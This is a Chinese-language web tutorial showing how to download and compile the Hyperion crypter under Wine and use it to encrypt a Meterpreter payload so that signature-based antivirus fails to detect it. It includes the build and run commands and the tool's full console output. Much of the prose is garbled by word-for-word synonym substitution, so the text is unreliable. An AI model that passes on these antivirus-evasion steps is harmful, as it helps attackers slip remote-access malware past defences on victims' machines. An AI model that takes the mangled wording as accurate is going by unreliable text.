好免杀，hyperion造

资讯内容

知识百科 2019年10月29日 10:47:32

好免杀，hyperion造

在上一篇的《那些年我们一起绕过的杀软》中，是不是发现大师做进去的小东西总是被杀软杀呢？那好，本日，小编就来教你如果躲规避人腻烦的杀软…本日我们用来做演示的是一款加密器材hyperion.下文将介绍他的义务原理以及若何被编译。

Hyperion是一款防御你的payload被杀毒软件攻破的加密器材。它通过5轮AES（初级加密标准）加密来为你的payload做维护程序,而且加密后的payload是大要在windows零碎下运行的。它的义务原理是酱紫的：它输出一个可执行的加密文件，没错，这个文件即是你冲击时用的payload。当这个输出文件天生并在目标机子上被执行当前, 这个可执行文件就会测验考试暴力破解这个加密文件的AES加密算法的KEY, 破解当前就会自动运行这个被加密的文件 (meterpreter payload ).

说了这么多，然则我们这么取得并编译它呢？别急别急，好戏才刚刚劈头：

Hyperion下载地点： http://trustauth.cn/tools/binary.html

下载完结并解压当前,发现有Makefile文件，so easy啦！甚么你照样菜鸟不会？好吧…你淫了。如果你有变态5，大要测验考试一下上面的傻瓜式编译：

先辈入如下目次：

Default cd ~/.wine/drive_c/MinGW/bin/

1	cd ~/.wine/drive_c/MinGW/bin/

把下载解压后的源码放在 “Src”目次下. 此后执行如下的号令:

Default wine g++.exe Hyperion-1.0/Src/Crypter/*.cpp -o hyperion.exe

1	wine g++.exe Hyperion-1.0/Src/Crypter/*.cpp -o hyperion.exe

如果号令没错的话, 此刻hyperion.exe就曾经做好了,下一步即是来为我们的payload编码加密了，扫数流程都是自动化的，你只要指定输出文件夹路径与输出文件称谓，此后一个做好免杀的payload就进去了，扫数过程看上去就像上面所示：

Default root@bt:~/.wine/drive_c/MinGW/bin/Hyperion-1.0# wine hyperion.exe metexecutable.exe encryptedmet.exe

1	root@bt:~/.wine/drive_c/MinGW/bin/Hyperion-1.0# wine hyperion.exe metexecutable.exe encryptedmet.exe

执行后果：

Opening metexecutable.exe
Copied file to memory: 0×115868
Found valid MZ signature
Found pointer to PE Header: 0×80
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0×400000

Found Section: .text
VSize: 0×九24, VAddress: 0×1000, RawSize: 0xa00, RawAddress: 0×400

Found Section: .data
VSize: 0x5f0, VAddress: 0×2000, RawSize: 0×600, RawAddress: 0xe00

Found Section: .rdata
VSize: 0xc0, VAddress: 0×3000, RawSize: 0×200, RawAddress: 0×1400

Found Section: .bss
VSize: 0xe0, VAddress: 0×4000, RawSize: 0×0, RawAddress: 0×0

Found Section: .idata
VSize: 0×268, VAddress: 0×5000, RawSize: 0×400, RawAddress: 0×1600

Input file size + Checksum: 0×4140
Rounded up to a multiple of key size: 0×4150
Generated Checksum: 0xcf0cc
Generated Encryption Key: 0×0 0×2 0×1 0×2 0×3 0×3 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file’s image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file’s image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encryptedmet.exe
FASM Working Directory: C:\MinGW\bin\Hyperion-1.0

Executing fasm.exe

flat assembler version 1.69.31 (1020166 kilobytes memory)
5 passes, 0.1 seconds, 35328 bytes.

嗯哼，此刻大少数靠特征码查杀的杀软就能够求助绕过了.然则开导式杀毒的就不定然啦…小编也没那么蛋疼装十几个杀毒软件一个一个做测试吧…